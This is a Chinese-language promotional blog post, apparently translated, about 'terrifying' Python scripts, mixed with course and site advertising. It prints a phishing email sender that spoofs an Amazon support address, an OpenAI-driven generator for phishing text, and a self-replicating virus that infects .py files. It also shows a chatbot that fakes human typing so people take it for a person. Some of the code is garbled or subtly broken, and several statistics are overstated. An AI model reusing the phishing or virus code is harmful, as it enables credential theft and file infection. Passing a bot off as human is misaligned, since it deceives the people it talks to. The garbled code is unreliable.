-
这是一份礼物 🎁:构建一个超简单的网站并收费500+元
- 还有这个:一周内推出你的第一个可下载内容(无需任何粉丝)
限时享受50%独家折扣优惠! 更便宜,甚至比你每天的咖啡价更低。
他们编写了代码——竟然打破了现实💡 最疯狂、最疯狂的Python脚本以及为什么它们令人害怕。
咱们先说清楚一件事:Python 不仅仅是初学者教程中使用的语言,还是简单的数据脚本。
这是一本现代的魔法手册。
有些人写的咒语太厉害了,简直像是在挑战现实的法则。
我们谈论的是可以比人类更聪明,渗透进入电脑系统,并自我重写的Python脚本。这些脚本不仅令人印象深刻,而且可能非常危险。
但不要移开目光。这并不是要吓唬你。而是为了让你做好准备。因为无论你是开发者、科技爱好者,还是希望在这个被代码驱动的世界里领先的人——(你需要知道可能的事情)。
如果你是 Python 开发者,收藏这个页面以备参考。
👉 Python 开发者资源 - 由 0x3d.site 制作
这是专为 Python 开发者打造的精选中心,提供必备工具和资源、文章和热门讨论。
从代码工具到前沿的人工智能项目,这里是您每日保持敏锐的中心。
此处省略若干字
🔐 1. 拥有99%成功率的AI钓鱼生成器神器Info:
据IBM 2023年威胁情报报告,网络钓鱼占所有网络攻击的41%。而人工智能驱动的网络钓鱼攻击在未经培训的用户上的成功率已超过90%。
这个Python脚本结合了使用AI生成文本、伪造邮件和伪造HTML的功能。
它是怎么工作的:
- 使用类似GPT的API(或者本地模型)来生成邮件内容。
- 模仿苹果、PayPal和微软等公司的品牌和写作风格。
- 使用
Flask或静态HTML生成一个假的登录页面。 - 通过SMTP库和IP轮换来发送邮件。
- 将凭证静默地记录到数据库或CSV中。
这里有一个例子(仅用于教育目的)。
import smtplib
from email.mime.text import MIMEText
def 发送钓鱼邮件(to_address, subject, body):
msg = MIMEText(body, 'html')
msg['Subject'] = subject
msg['From'] = 'support@amazons-account-team.com'
msg['To'] = to_address
with smtplib.SMTP('smtp.sendgrid.net', 587) as server:
server.starttls()
server.login('apikey', '请替换为您的SendGrid API密钥')
server.sendmail(msg['From'], [to_address], msg.as_string())
点击全屏进入,再点击退出即可
在编写电子邮件正文时,脚本会使用:
导入来自openai的OpenAI
def generate_email(prompt):
"""
生成一个基于给定提示的电子邮件内容。
"""
return openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)['choices'][0]['message']['content']
切换到全屏模式,然后关闭全屏模式
注意: 这种脚本如果被恶意使用会非常违法。此类代码仅应在道德黑客演练中或培训意识中出现。
此处省略内容
🦠 2.: 可以 自我 复制 的 Python 恶意 软件, 能 感染 其他 脚本这简直就像是从科幻电影里直接搬出来的场景啊。
Info:
MITRE 和 Kaspersky 研究人员确认在实际的 Linux 环境中发现了 Python 恶意软件。最危险的形式的是 无文件痕迹 的,隐藏在内存或合法的脚本文件中。
它是这样的:
- 扫描目录下的
.py文件。 - 检查文件是否已被感染。
- 如果没有感染,则将病毒载荷附加到目标脚本中。
- 每次循环时,通过微调代码来避免被签名检测。
一个非常基本的代码片段的例子:
virus_code = """# 开始病毒
import os
print("你已经被病毒感染了!")
# 结束病毒"""
def 传播病毒():
for 文件 in os.listdir():
if 文件.endswith('.py') and 'infected' not in 文件:
with open(文件, 'r') as f:
内容文本 = f.read()
if '# begin_virus' not in 内容文本:
with open(文件, 'w') as f:
f.write(virus_code + '\n' + 内容文本)
传播病毒()
print("病毒已经传播到所有未被感染的.py文件中!")
进入全屏模式,退出全屏
真正的恶意软件会加密数据,混淆函数名称,并在系统重启后仍然存活。它甚至可能会使用像 pyinstaller 这样的工具来创建单独的 .exe 文件之类的。
你应该做什么好?
- 建议使用不可变部署容器。
- 使用像Tripwire或OSSEC这样的工具来监控文件的完整性。
- 不要运行未经验证的
.py文件,即使是从GitHub上获取的也不例外。
📚 保持保护,通过最新的实践方法和实际案例:
🔗 开发者资源 @ python.0x3d.site/dev-resources
……
- 有空的话可以试试(也是个促销哦)
此处略去
🤖 3. 像真人的AI聊天机器人这些机器人不仅仅聪明,它们的真实程度令人不安得令人难以置信。
Info:
2024年,斯坦福大学的研究人员在模拟小镇中进行了一次公共测试,测试人工智能代理的表现。超过70%的人类参与者未能分辨哪些角色是机器人。
Python机器人是怎么通过图灵测试这个标准的:
- 对话记忆:
这会把用户交互存储在 sqlite3 或 redis 中,来模拟记忆。
- 打字模拟:
使用像 pyautogui 和 time.sleep 这样的库来模仿打字动作。
- 行为模仿:
他们会模仿迟疑、俚语、调侃,甚至错别字。
示例机器人骨架
import time
import random
import openai
def 模拟打字(text):
for char in text:
print(char, end='', flush=True)
time.sleep(random.uniform(0.03, 0.15))
def 聊天回复(prompt):
response = openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)['choices'][0]['message']['content']
return response
while True:
user_input = input("你: ")
reply = 聊天回复(user_input)
模拟打字("机器人: " + reply + "\n")进入全屏,退出全屏
🎯 这些机器人已经在管理 subreddit 社区,提供技术支持,并在 Discord 服务器中混入。不要以为你在和真人聊天哦。
👀 想知道这些在实际中是如何被使用的吗?
👉 热门话题:热门讨论 python.0x3d.site/trending-discussions
……
💻 4. 自动写脚本的程序(自动编码器/AutoCoder)你给它一个任务,它就帮你写整个Python脚本,从头写到尾。
Info:
GitHub Copilot 和开源替代品如
Tabby、CodeGeeX、和Smol Developer已经重新定义了生产力。一些开发人员报告使用这些自动化代码工具使原型开发速度提高了5倍。
看起来像:
# config.yaml
task: "创建一个使用 FastAPI 的服务器,该服务器接受 POST 请求并返回传来的数字的平方。"
language: python
framework: fastapi
退出全屏
脚本读取 YAML,生成 GPT 提示,生成代码,通过测试输入来验证生成的代码,最后部署生成的代码。
🔧 使用的工具有:
PyYAML用于配置文件解析openai或ollama用于本地部署的模型pytest或自定义断言用于测试验证
这将是标准文本的未来。
🔗 点击这里探索快速上手工具和生成器:
🛠 python.0x3d.site/trending-repositories 热门项目
此处省略内容
⚖️ 5. 天才与滥用之间的分界线所有这些代码都有一个共同之处:力量。
而权力被错误的人掌握?它会破坏。但权力被正确的人掌握?它能保护。
真正的问题不在于这些脚本很危险,而在于它们可以被学习。通过理解这些脚本,你可以更好地构建智能工具,保护用户的安全,并大胆创新。
此处省略内容
🧠 最后想说的:不只是构建,还要防御,用 Python 不仅要构建,还要防御,就这么定了。
代码已不再仅仅是我们的创作。它是我们沉浸其中的东西。你用的每个应用、填的每个表单、读的每封邮件——这些都离不开代码。
Python写起来或许简单,但它的影响力却不简单。
所以要深入学习。研究可能的领域。成为那种不仅知道要构建什么,还知道要留心什么的开发者。
保存书签:
🔗 Python 开发者资源 - 由 0x3d.site 制作
您掌握现代 Python 的基地:文章、工具和真正重要的讨论。
此处省略内容
让我们创造那些突破极限但又保护人们的东西。
Python不仅仅是一种语言,它更像是一种力量。
👊 你准备好了,要明智地用它吗?
📚 给开发者们的优质学习材料
您可以通过这些高质量的课程来增加知识:
🚀 开发者的网络安全生存工具包 – 使用真实的实战策略和工具(如 Burp Suite、Nmap 和 OSINT 技术)来保护你的代码。
教你如何通过编程技能赚取被动收入的指南 — 自动生成 10 多种收入流的方法
🌐 互联网是如何工作的:让网络运转的技术 – 深入了解支撑着互联网的协议、服务器和基础设施。
💻 API编程:了解API、协议、安全和实现 – 通过结构化的维基百科学习,掌握API基本知识。
🕵️ 全面的OSINT指南(适用于技术人士) – 学会像专家一样追踪、分析并保护数字足迹。
🧠 黑客和间谍如何使用相同的心理手段对付你 – 来了解技术在操纵、欺骗和说服方面上的阴暗面。
🔥 更多细分领域的高价值学习资料 → 查看详情
每个开发者都可能精通 Python 或 JavaScript,但那些奠定现代计算基础却被遗忘的语言又如何呢?《构建互联网的失落编程语言》这门课程深入探讨了那些虽几乎被遗忘但却依然在幕后为关键系统提供动力的历史编程语言。本课程专为希望探索计算起源并了解这些遗留语言如何影响现代软件的技术爱好者设计。
课程大纲(目录):
模块 1:先驱编程语言
- Fortran
- COBOL
- ALGOL 60
- LISP
- 汇编语言
模块 2:结构性与过程化先驱编程语言 - PL/I
- Ada
- Pascal
- Modula-2
- ALGOL 68
模块 3:面向对象的创新编程语言 - Smalltalk
- Simula
- Eiffel
- Objective-C
- Self
模块 4:脚本与模式匹配语言 - SNOBOL
- APL
- Icon
- awk
- sed
模块 5:商业与遗留数据处理语言 - RPG
- MUMPS
- JCL
- SAS
- dBase
模块 6:低级与嵌入式编程语言先驱 - BCPL
- B
- PL/M
- Forth
- Occam
模块 7:函数式与声明性探索 - Miranda
- ML
- Scheme
- Curry
- Clean
模块 8:科学与数学语言 - J
- K
- S IDL
- Maple
模块 9:网络脚本语言 - Tcl
- REXX
- ColdFusion
- Perl
- VBScript
模块 10:晦涩与奇特编程语言 - INTERCAL
- Brainfuck
- Befunge
- Whitespace
- Piet
模块 11:关键遗产系统中的编程语言 - Prolog
- 梯形逻辑
- Modula-3
- Oberon
- Mesa
发掘构建我们数字世界的语言之谜。今天就报名参加《构建互联网的失落编程语言》课程,重新发现仍在影响现代技术的遗产!
snappytuts.gumroad.com
将其视为一份礼物🎁:搭建一个超级简单的网站并收取500元以上。
medium.com
共同学习,写下你的评论
评论加载中...
作者其他优质文章
